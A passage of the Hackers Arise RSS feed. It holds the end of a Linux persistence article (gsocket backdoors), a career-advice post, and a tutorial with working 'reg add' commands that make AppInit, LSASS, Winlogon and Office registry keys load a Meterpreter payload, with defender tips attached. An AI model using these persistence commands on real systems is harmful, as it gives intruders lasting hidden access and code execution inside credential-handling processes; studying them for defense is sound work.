  2194. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="833" height="458" src="https://hackers-arise.com/wp-content/uploads/2025/08/12-connecting-over-gsocket.webp" alt="installing gs-netcat and connecting to the target" class="wp-image-17355" srcset="https://hackers-arise.com/wp-content/uploads/2025/08/12-connecting-over-gsocket.webp 833w, https://hackers-arise.com/wp-content/uploads/2025/08/12-connecting-over-gsocket-300x165.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/08/12-connecting-over-gsocket-768x422.webp 768w" sizes="(max-width: 833px) 100vw, 833px" /></figure>
  2195.  
  2196.  
  2197.  
  2198. <p>More information can be found here:</p>
  2199.  
  2200.  
  2201.  
  2202. <p><a href="https://www.gsocket.io/deploy">https://www.gsocket.io/deploy</a></p>
  2203.  
  2204.  
  2205.  
  2206. <p><strong>Pros: </strong>A stealthy way to establish remote access, pivot, exfiltrate data, or maintain a backdoor, especially in complex network environments.</p>
  2207.  
  2208.  
  2209.  
2210. <p><strong>Cons:</strong> Leaves traces, such as persistent scripts or network access patterns, and its reliance on a shared secret requires careful secret management.</p>
  2211.  
  2212.  
  2213.  
  2214. <h2 class="wp-block-heading"><strong>Summary</strong></h2>
  2215.  
  2216.  
  2217.  
  2218. <p>In part two, we stepped away from the basics and explored persistence and access techniques that push deeper into stealth and adaptability. We started with in-memory backdoors, great for situations where avoiding detection matters more than surviving a reboot. We then moved on to persistence through config changes, such as creating hidden users in <code>/etc/passwd</code>, which survive reboots without needing any malicious process running. After that, we covered LD_PRELOAD, a dynamic linker trick that quietly injects code into normal processes. We looked at <code>rc.local</code> for quick, legacy-style startup hooks, and wrapped up with gsocket, a tunneling tool that can keep a lifeline open even through restrictive firewalls or NAT.</p>
  2219.  
  2220.  
  2221.  
  2222. <p>Together, these two parts give you a layered approach: fast, simple persistence to hold your ground, plus stealthy, advanced techniques to stay in control for the long haul.</p><p>The post <a href="https://hackers-arise.com/advanced-linux-persistence-strategies-for-remaining-inside-a-linux-target/">Advanced Linux Persistence: Strategies for Remaining Inside a Linux Target</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
  2223. </item>
  2224. <item>
  2225. <title>How to Find an Entry-Level Job in Cybersecurity</title>
  2226. <link>https://hackers-arise.com/how-to-find-an-entry-level-job-in-cybersecurity/</link>
  2227. <dc:creator><![CDATA[OTW]]></dc:creator>
  2228. <pubDate>Thu, 02 Oct 2025 18:21:15 +0000</pubDate>
  2229. <category><![CDATA[Career]]></category>
  2230. <guid isPermaLink="false">https://hackers-arise.com/?p=18429</guid>
  2231.  
  2232. <description><![CDATA[<p>Welcome back, my aspiring cyberwarriors! So many of you have written me about the difficulties of finding an entry-level job in cybersecurity that I thought I should offer you some of my insights. At this moment in history, artificial intelligence (AI) is making it particularly difficult to find that entry-level job as companies are using [&#8230;]</p>
  2233. <p>The post <a href="https://hackers-arise.com/how-to-find-an-entry-level-job-in-cybersecurity/">How to Find an Entry-Level Job in Cybersecurity</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
  2234. <content:encoded><![CDATA[<p>Welcome back, my aspiring cyberwarriors!</p>
  2235.  
  2236.  
  2237.  
  2238. <p>So many of you have written me about the difficulties of finding an entry-level job in cybersecurity that I thought I should offer you some of my insights. At this moment in history, artificial intelligence (AI) is making it particularly difficult to find that entry-level job as companies are using AI to fulfill these tasks. </p>
  2239.  
  2240.  
  2241.  
  2242. <p>Here are my thoughts on the best approach to landing that first job in cybersecurity!</p>
  2243.  
  2244.  
  2245.  
  2246.  
  2247.  
  2248.  
  2249.  
  2250. <p>The best way to get a starting level job in cybersecurity is to combine <strong>industry certifications</strong>, <strong>hands-on skills development</strong>, networking, and relevant IT experience or education.</p>
  2251.  
  2252.  
  2253.  
  2254.  
  2255.  
  2256.  
  2257.  
  2258. <h2 class="wp-block-heading">Step #1. Build Foundations and Skills</h2>
  2259.  
  2260.  
  2261.  
  2262. <ul class="wp-block-list">
  2263. <li>Study the basics: Networking, operating systems (especially Linux), system administration, scripting (e.g., Python), and security fundamentals. You can gain this background from my books <a href="https://amzn.to/3VMwrEE" title="">Linux Basics for Hackers</a>, <a href="https://amzn.to/4gVlNVR" title="">Network Basics for Hackers</a> and my upcoming Python Basics for Hackers.</li>
  2264.  
  2265.  
  2266.  
  2267. <li>Use free online resources, cybersecurity blogs (such as Hackers-Arise.com), and YouTube channels (David Bombal, Yaniv Hoffman, Network Chuck) for practical, hands-on labs.</li>
  2268.  
  2269.  
  2270.  
  2271. <li>Learn basic programming—while not always required, scripting helps with automation and troubleshooting.</li>
  2272. </ul>
  2273.  
  2274.  
  2275.  
  2276. <figure class="wp-block-image aligncenter size-large"><img loading="lazy" decoding="async" width="1024" height="359" src="https://hackers-arise.com/wp-content/uploads/2025/10/linux-2ed-1-1024x359.png" alt="" class="wp-image-18546" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/linux-2ed-1-1024x359.png 1024w, https://hackers-arise.com/wp-content/uploads/2025/10/linux-2ed-1-300x105.png 300w, https://hackers-arise.com/wp-content/uploads/2025/10/linux-2ed-1-768x269.png 768w, https://hackers-arise.com/wp-content/uploads/2025/10/linux-2ed-1.png 1150w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  2277.  
  2278.  
  2279.  
  2280. <h2 class="wp-block-heading">Step #2. Get Industry-Recognized Certifications</h2>
  2281.  
  2282.  
  2283.  
  2284. <ul class="wp-block-list">
  2285. <li>Start with <strong>CompTIA Security+</strong> — the most respected entry-level cert; many entry-level jobs list it as a requirement.</li>
  2286.  
  2287.  
  2288.  
  2289. <li>Consider Network+ for networking fundamentals, or more specialized options such as SSCP or GCIH.</li>
  2290.  
  2291.  
  2292.  
  2293. <li>Certifications signal employers you know security basics and are serious about the field.</li>
  2294. </ul>
  2295.  
  2296.  
  2297.  
  2298. <h2 class="wp-block-heading">Step #3. Pursue Hands-On Experience</h2>
  2299.  
  2300.  
  2301.  
  2302. <ul class="wp-block-list">
  2303. <li>Apply for IT/help desk, junior admin, or tech support roles—these are common stepping stones into security.</li>
  2304.  
  2305.  
  2306.  
  2307. <li>Take on internships, volunteer for IT/security projects, or contribute to open-source security initiatives. There are multiple open-source projects where you can gain hands-on experience without going through the hiring process. This indicates a strong commitment to cybersecurity and can help get past the &#8220;no experience&#8221; threshold. Hackers-Arise always has multiple open-source projects in our Discord server.</li>
  2308.  
  2309.  
  2310.  
  2311. <li>Build a personal “home lab” environment to practice tools and attacks in a legal, safe manner. You can accomplish this inexpensively and without needing an Internet connection using VMware or VirtualBox.</li>
  2312. </ul>
  2313.  
  2314.  
  2315.  
  2316. <h2 class="wp-block-heading">Step #4. Network and Get Involved</h2>
  2317.  
  2318.  
  2319.  
  2320. <ul class="wp-block-list">
  2321. <li>Attend local security meetups, online communities (Reddit, LinkedIn, Twitter), and conferences to build professional connections. This can also include the Hackers-Arise Discord server and community.</li>
  2322.  
  2323.  
  2324.  
  2325. <li>Connect with cybersecurity practitioners for insight, mentorship, and potential referrals.</li>
  2326. </ul>
  2327.  
  2328.  
  2329.  
  2330. <figure class="wp-block-image aligncenter size-full"><img loading="lazy" decoding="async" width="468" height="82" src="https://hackers-arise.com/wp-content/uploads/2025/10/best-community-hands-down.png" alt="" class="wp-image-18545" srcset="https://hackers-arise.com/wp-content/uploads/2025/10/best-community-hands-down.png 468w, https://hackers-arise.com/wp-content/uploads/2025/10/best-community-hands-down-300x53.png 300w" sizes="(max-width: 468px) 100vw, 468px" /></figure>
  2331.  
  2332.  
  2333.  
  2334. <h2 class="wp-block-heading">Step #5. Tailor Your Resume and Apply Broadly</h2>
  2335.  
  2336.  
  2337.  
  2338. <ul class="wp-block-list">
  2339. <li>Document hands-on skills, home lab work, certifications, and transferable skills from any IT roles.</li>
  2340.  
  2341.  
  2342.  
  2343. <li>Customize your resume for each job and be ready to explain your skills and learning journey in interviews.</li>
  2344.  
  2345.  
  2346.  
  2347. <li>Explore entry-level roles such as SOC analyst, junior pentester, security technician, and IT support with a security focus.</li>
  2348. </ul>
  2349.  
  2350.  
  2351.  
  2352. <hr class="wp-block-separator has-alpha-channel-opacity"/>
  2353.  
  2354.  
  2355.  
  2356. <h2 class="wp-block-heading">Summary</h2>
  2357.  
  2358.  
  2359.  
  2360. <ul class="wp-block-list">
  2361. <li><strong>Certifications + hands-on learning</strong> = fastest path to entry-level roles.</li>
  2362.  
  2363.  
  2364.  
  2365. <li><strong>Network and build connections</strong> in the security community—it’s often who you know that helps get a foot in the door.</li>
  2366.  
  2367.  
  2368.  
  2369. <li>Apply even if you don’t meet every listed requirement: employers want passion, constant learning, and initiative in entry-level candidates.</li>
  2370. </ul>
  2371.  
  2372.  
  2373.  
  2374. <p>This blended approach maximizes your chances of breaking into cybersecurity quickly, even without prior professional experience.</p><p>The post <a href="https://hackers-arise.com/how-to-find-an-entry-level-job-in-cybersecurity/">How to Find an Entry-Level Job in Cybersecurity</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
  2375. </item>
  2376. <item>
  2377. <title>Advanced Windows Persistence, Part 2: Using the Registry to Maintain Persistence</title>
  2378. <link>https://hackers-arise.com/advanced-windows-persistence-part-2-using-the-registry-to-maintain-persistence/</link>
  2379. <dc:creator><![CDATA[Co11ateral]]></dc:creator>
  2380. <pubDate>Thu, 02 Oct 2025 16:59:22 +0000</pubDate>
  2381. <category><![CDATA[Command and Control (C2)]]></category>
  2382. <category><![CDATA[Cyberwar]]></category>
  2383. <category><![CDATA[Cyberwarrior]]></category>
  2384. <category><![CDATA[Metasploit]]></category>
  2385. <category><![CDATA[Powershell]]></category>
  2386. <category><![CDATA[Windows]]></category>
  2387. <category><![CDATA[advanced persistence]]></category>
  2388. <category><![CDATA[AppInit DLL injection]]></category>
  2389. <category><![CDATA[cyberwarfare]]></category>
  2390. <category><![CDATA[HACKING]]></category>
  2391. <category><![CDATA[HKCU persistence]]></category>
  2392. <category><![CDATA[LSASS persistence]]></category>
  2393. <category><![CDATA[offensive security]]></category>
  2394. <category><![CDATA[Office registry keys]]></category>
  2395. <category><![CDATA[post-exploitation]]></category>
  2396. <category><![CDATA[privilege abuse]]></category>
  2397. <category><![CDATA[reboot survival]]></category>
  2398. <category><![CDATA[red team tactics]]></category>
  2399. <category><![CDATA[registry persistence]]></category>
  2400. <category><![CDATA[stealth backdoors]]></category>
  2401. <category><![CDATA[Windows persistence]]></category>
  2402. <category><![CDATA[Winlogon hijack]]></category>
  2403. <guid isPermaLink="false">https://hackers-arise.com/?p=17878</guid>
  2404.  
  2405. <description><![CDATA[<p>Learn registry-based Windows persistence with AppInit DLLs, LSASS packages, Winlogon hijacks, and Office keys. These methods survive reboots.</p>
  2406. <p>The post <a href="https://hackers-arise.com/advanced-windows-persistence-part-2-using-the-registry-to-maintain-persistence/">Advanced Windows Persistence, Part 2: Using the Registry to Maintain Persistence</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></description>
  2407. <content:encoded><![CDATA[<p>Welcome back, aspiring cyberwarriors! </p>
  2408.  
  2409.  
  2410.  
  2411. <p>Persistence on Windows systems has always been a cat-and-mouse game between attackers looking for reliable footholds and defenders trying to close down avenues of abuse. Windows itself provides a wide range of mechanisms that are legitimate parts of system functionality, yet each of them can be turned into a way of ensuring malicious code runs again and again after reboot or logon. Registry values, system processes, and initialization routines are all potential targets for persistence, and while most of them were never designed with security in mind, they remain available today. What makes them attractive is durability: once configured, they survive restarts and provide repeated execution opportunities without requiring the attacker to manually re-enter the environment. </p>
  2412.  
  2413.  
  2414.  
  2415. <p>The techniques described here are all examples of registry-based persistence, each with its own advantages, drawbacks, and detection footprints. Understanding them is crucial for both attackers, who rely on stability, and defenders, who need to spot tampering before it causes damage.</p>
  2416.  
  2417.  
  2418.  
  2419. <h2 class="wp-block-heading"><strong>AppInit</strong></h2>
  2420.  
  2421.  
  2422.  
  2423. <p>AppInit is a legacy Windows feature that tells the OS loader to map one or more DLLs into any process that links user32.dll. That means when many GUI apps start, Windows will automatically load the DLLs listed in that registry value, giving whatever code is inside those DLLs a chance to run inside those processes. It’s a registry-based, machine-wide mechanism that survives reboot and affects both 32-bit and 64-bit GUI applications when configured.</p>
  2424.  
  2425.  
  2426.  
  2427. <p><code>cmd#&gt; reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t reg_dword /d 0x1 /f</code></p>
  2428.  
  2429.  
  2430.  
  2431. <p><code>cmd#&gt; reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t reg_sz /d "C:\meter64.dll" /f</code></p>
  2432.  
  2433.  
  2434.  
  2435. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="970" height="174" src="https://hackers-arise.com/wp-content/uploads/2025/09/1-appinit-persistence-technique.webp" alt="AppInit windows persistence technique" class="wp-image-17879" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/1-appinit-persistence-technique.webp 970w, https://hackers-arise.com/wp-content/uploads/2025/09/1-appinit-persistence-technique-300x54.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/1-appinit-persistence-technique-768x138.webp 768w" sizes="(max-width: 970px) 100vw, 970px" /></figure>
  2436.  
  2437.  
  2438.  
  2439. <p><code>cmd#&gt; reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v LoadAppInit_DLLs /t reg_dword /d 0x1 /f</code></p>
  2440.  
  2441.  
  2442.  
  2443. <p><code>cmd#&gt; reg add "HKLM\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows" /v AppInit_DLLs /t reg_sz /d "C:\meter32.dll" /f</code></p>
  2444.  
  2445.  
  2446.  
  2447. <p>The first command turns the AppInit behavior on for the 64-bit registry view. The second command writes the path to the DLL(s) that Windows should try to load into GUI processes (this value is a string of one or more DLL paths). The next two commands do the same thing for the 32-bit registry view on a 64-bit system: the first enables the mechanism for 32-bit processes, and the second sets the 32-bit DLL path.</p>
  2448.  
  2449.  
  2450.  
  2451. <p>In plain terms: enable AppInit, tell Windows which DLLs to load, and do it for both 64-bit and 32-bit processes so GUI apps of both architectures will load the specified libraries.</p>
  2452.  
  2453.  
  2454.  
  2455. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="997" height="144" src="https://hackers-arise.com/wp-content/uploads/2025/09/2-appinit-persistence-connection-received.webp" alt="AppInit persistence initiated a connection back" class="wp-image-17880" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/2-appinit-persistence-connection-received.webp 997w, https://hackers-arise.com/wp-content/uploads/2025/09/2-appinit-persistence-connection-received-300x43.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/2-appinit-persistence-connection-received-768x111.webp 768w" sizes="(max-width: 997px) 100vw, 997px" /></figure>
  2456.  
  2457.  
  2458.  
  2459. <p><strong>Pros:</strong> survives reboots and causes the DLL to be loaded into many GUI processes automatically, giving broad coverage without per-user startup entries.</p>
  2460.  
  2461.  
  2462.  
  2463. <p><strong>Cons:</strong> requires administrative rights to change HKLM, is noisy because the DLL will appear loaded in many processes (creating strong telemetry), and relies on an older, well-known mechanism that defenders often check.</p>
  2464.  
  2465.  
  2466.  
  2467. <p>If you’re a defender, focus on auditing the HKLM Windows keys (including the Wow6432Node path) and monitoring unusual DLL loads into system or common GUI processes.</p>
  2468.  
  2469.  
  2470.  
  2471. <h2 class="wp-block-heading"><strong>LSASS</strong></h2>
  2472.  
  2473.  
  2474.  
  2475. <p>Modifying LSASS’s configuration to load an extra DLL is a way to get code executed inside a highly privileged, long-lived system process. LSASS is responsible for enforcing security policy and handling credentials. Because it loads configured authentication/notification packages at startup, adding an entry here causes the chosen module to be loaded into that process and remain active across reboots. That makes it powerful, but dangerous.</p>
  2476.  
  2477.  
  2478.  
  2479. <p><code>cmd#&gt; reg add "HKLM\system\currentcontrolset\control\lsa" /v "Notification Packages" /t reg_multi_sz /d "rassfm\0scecli\0meter" /f</code></p>
  2480.  
  2481.  
  2482.  
  2483. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="961" height="116" src="https://hackers-arise.com/wp-content/uploads/2025/09/3-lsass-persistence-technique.webp" alt="LSASS windows persistence technique" class="wp-image-17881" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/3-lsass-persistence-technique.webp 961w, https://hackers-arise.com/wp-content/uploads/2025/09/3-lsass-persistence-technique-300x36.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/3-lsass-persistence-technique-768x93.webp 768w" sizes="(max-width: 961px) 100vw, 961px" /></figure>
  2484.  
  2485.  
  2486.  
  2487. <p>The registry command updates the <strong>Notification Packages</strong> multi-string value under the LSA key. In simple terms, this line tells Windows “when LSASS starts, also load the packages named <code>rassfm</code>, <code>scecli</code> and <code>meter</code>,” and the <code>/f</code> switch forces the write if the value already exists.</p>
  2488.  
  2489.  
  2490.  
  2491. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="903" height="142" src="https://hackers-arise.com/wp-content/uploads/2025/09/4-lsass-connection-received-1.webp" alt="LSASS persistence initiated a connection back" class="wp-image-17888" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/4-lsass-connection-received-1.webp 903w, https://hackers-arise.com/wp-content/uploads/2025/09/4-lsass-connection-received-1-300x47.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/4-lsass-connection-received-1-768x121.webp 768w" sizes="(max-width: 903px) 100vw, 903px" /></figure>
  2492.  
  2493.  
  2494.  
  2495. <p><strong>Pros:</strong> survives reboots and places code inside a long-running, high-privilege process, making the persistence both durable and powerful.</p>
  2496.  
  2497.  
  2498.  
  2499. <p><strong>Cons:</strong> requires administrative privileges to change the LSA registry, produces extremely high-risk telemetry and stability impact (misconfiguration or a buggy module can crash LSASS and destabilize or render the system unusable), and it is highly suspicious to defenders.</p>
  2500.  
  2501.  
  2502.  
  2503. <p>Putting code into LSASS buys durability and access to sensitive material, but it is one of the loudest and riskiest persistence techniques: it demands admin rights, creates strong signals for detection, and can crash the machine if done incorrectly.</p>
  2504.  
  2505.  
  2506.  
  2507. <h2 class="wp-block-heading"><strong>Winlogon</strong></h2>
  2508.  
  2509.  
  2510.  
  2511. <p>Winlogon is the component that handles interactive user logons, and it calls the program(s) listed in the <code>UserInit</code> registry value after authentication completes. By appending an additional executable to that <code>UserInit</code> string you ensure your program is launched automatically every time someone signs in interactively.</p>
  2512.  
  2513.  
  2514.  
  2515. <p><code>cmd#&gt; reg add "HKLM\software\microsoft\windows nt\currentversion\winlogon" /v UserInit /t reg_sz /d "c:\windows\system32\userinit.exe, c:\meter.exe"</code></p>
  2516.  
  2517.  
  2518.  
  2519. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="970" height="192" src="https://hackers-arise.com/wp-content/uploads/2025/09/5-winlogon-persistence-technique.webp" alt="Winlogon persistence technique" class="wp-image-17884" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/5-winlogon-persistence-technique.webp 970w, https://hackers-arise.com/wp-content/uploads/2025/09/5-winlogon-persistence-technique-300x59.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/5-winlogon-persistence-technique-768x152.webp 768w" sizes="(max-width: 970px) 100vw, 970px" /></figure>
  2520.  
  2521.  
  2522.  
  2523. <p>This keeps the normal <code>userinit.exe</code> first and appends <code>c:\meter.exe</code>, so when Winlogon runs it will launch <code>userinit.exe</code> and then <code>meter.exe</code> as part of the logon sequence. Be aware that <code>UserInit</code> must include the legitimate <code>userinit.exe</code> path first. Removing or misordering it can break interactive logons and lock users out.</p>
  2524.  
  2525.  
  2526.  
  2527. <figure class="wp-block-image size-large"><img loading="lazy" decoding="async" width="1024" height="139" src="https://hackers-arise.com/wp-content/uploads/2025/09/6-winlogon-persistence-connection-received-1024x139.webp" alt="Winlogon persistence initiated a connection back" class="wp-image-17885" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/6-winlogon-persistence-connection-received-1024x139.webp 1024w, https://hackers-arise.com/wp-content/uploads/2025/09/6-winlogon-persistence-connection-received-300x41.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/6-winlogon-persistence-connection-received-768x104.webp 768w, https://hackers-arise.com/wp-content/uploads/2025/09/6-winlogon-persistence-connection-received.webp 1064w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>
  2528.  
  2529.  
  2530.  
  2531. <p><strong>Pros:</strong> survives reboots and reliably executes at every interactive user logon, giving consistent persistence across sessions.</p>
  2532.  
  2533.  
  2534.  
  2535. <p><strong>Cons:</strong> requires administrative privileges to change HKLM, offers no scheduling control (it only runs at logon), and is risky, since misconfiguring the UserInit value can prevent users from logging in and produces obvious forensic signals.</p>
  2536.  
  2537.  
  2538.  
  2539. <h2 class="wp-block-heading"><strong>Microsoft Office</strong></h2>
  2540.  
  2541.  
  2542.  
  2543. <p>Many Office components read configuration from the current user’s registry hive, and attackers can abuse that by inserting a path or DLL name that Office will load or reference when the user runs the suite. This approach is per-user and survives reboots because the configuration is stored in HKCU, but it only triggers when the victim actually launches the Office component that reads that key. It’s useful when the target regularly uses Office and you want a simple, low-privilege persistence mechanism that doesn’t require installing a service or touching machine-wide autoruns.</p>
  2544.  
  2545.  
  2546.  
  2547. <p><code>cmd$&gt; reg add "HKCU\Software\Microsoft\Office test\Special\Perf" /t REG_SZ /d C:\meter.dll</code></p>
  2548.  
  2549.  
  2550.  
  2551. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="795" height="140" src="https://hackers-arise.com/wp-content/uploads/2025/09/7-office-persistence-technique.webp" alt="Microsoft Office windows persistence technique" class="wp-image-17886" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/7-office-persistence-technique.webp 795w, https://hackers-arise.com/wp-content/uploads/2025/09/7-office-persistence-technique-300x53.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/7-office-persistence-technique-768x135.webp 768w" sizes="(max-width: 795px) 100vw, 795px" /></figure>
  2552.  
  2553.  
  2554.  
  2555. <figure class="wp-block-image size-full"><img loading="lazy" decoding="async" width="903" height="171" src="https://hackers-arise.com/wp-content/uploads/2025/09/8-office-persistence-connection-received.webp" alt="Microsoft Office persistence initiated a connection back" class="wp-image-17887" srcset="https://hackers-arise.com/wp-content/uploads/2025/09/8-office-persistence-connection-received.webp 903w, https://hackers-arise.com/wp-content/uploads/2025/09/8-office-persistence-connection-received-300x57.webp 300w, https://hackers-arise.com/wp-content/uploads/2025/09/8-office-persistence-connection-received-768x145.webp 768w" sizes="(max-width: 903px) 100vw, 903px" /></figure>
  2556.  
  2557.  
  2558.  
  2559. <p><strong>Pros:</strong> survives reboots and works from a normal user account because it lives in HKCU, so no administrative rights are required.</p>
  2560.  
  2561.  
  2562.  
  2563. <p><strong>Cons:</strong> there’s no scheduling control; it only triggers when the user launches the relevant Office component, so you cannot control an execution interval.</p>
  2564.  
  2565.  
  2566.  
  2567. <h2 class="wp-block-heading"><strong>Summary</strong></h2>
  2568.  
  2569.  
  2570.  
  2571. <p>Windows persistence through registry modifications offers multiple paths, from legacy AppInit DLL injection to LSASS notification packages, Winlogon UserInit hijacking, and Office registry keys under HKCU. Each of these methods survives reboots, ensuring repeated code execution, but they vary in scope and stealth. AppInit and Office rely on application startup, while LSASS and Winlogon provide broader and more privileged coverage. All require different levels of access, with the most powerful options also being the loudest in telemetry and the riskiest to system stability. For defenders, the key takeaway is clear: monitoring critical registry keys under HKLM and HKCU, watching for unusual DLL or executable loads, and ensuring proper auditing are essential.</p><p>The post <a href="https://hackers-arise.com/advanced-windows-persistence-part-2-using-the-registry-to-maintain-persistence/">Advanced Windows Persistence, Part 2: Using the Registry to Maintain Persistence</a> first appeared on <a href="https://hackers-arise.com">Hackers Arise</a>.</p>]]></content:encoded>
  2572. </item>
  2573. </channel>
  2574. </rss>
  2575.  
